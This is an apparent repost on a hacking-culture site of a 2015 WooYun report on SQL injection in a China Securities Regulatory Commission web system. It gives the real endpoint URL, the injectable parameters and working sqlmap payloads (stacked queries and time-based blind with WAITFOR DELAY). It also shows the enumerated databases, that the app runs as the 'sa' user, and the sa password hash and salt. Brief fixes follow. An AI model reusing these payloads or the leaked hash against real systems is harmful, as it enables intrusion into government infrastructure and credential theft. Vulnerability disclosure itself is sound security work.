记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国证监会某系统SQL注入漏洞

2015-08-18 01:55

code 区域
http://gzly.12386.gov.cn/csrc/sh.web.onlinecall.validatePassWord.sh?queryCode=1&pwd=1



注入点为queryCode和pwd(这俩参数都能注)。

Snip20150812_3.png

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: queryCode

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: queryCode=1'); WAITFOR DELAY '0:0:5';-- AND ('egSg'='egSg&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: queryCode=1') WAITFOR DELAY '0:0:5'-- AND ('JckC'='JckC&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1

---



web application technology: JSP

back-end DBMS: Microsoft SQL Server 2008



available databases [8]:

[*] csrc_inb

[*] master

[*] model\14

[*] msdb

[*] ReportServer$SERVERDB

[*] ReportServer$SERVERDBTempDB

[*] tempdb

[*] test1



current user: 'sa'



database management system users password hashes:

[*] sa [1]:

password hash: 0x0100b305d51f8ebcb632e990e3bf86a7920cfa697f29e6044563

header: 0x0100

salt: b305d51f

mixedcase: 8ebcb632e990e3bf86a7920cfa697f29e6044563

修复方案:

1、参数化查询;

2、过滤特殊字符;

3、数据库用户别用sa,违反了最小权限原则。

知识来源: www.wooyun.org/bugs/wooyun-2015-0133705

阅读:83851 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国证监会某系统SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词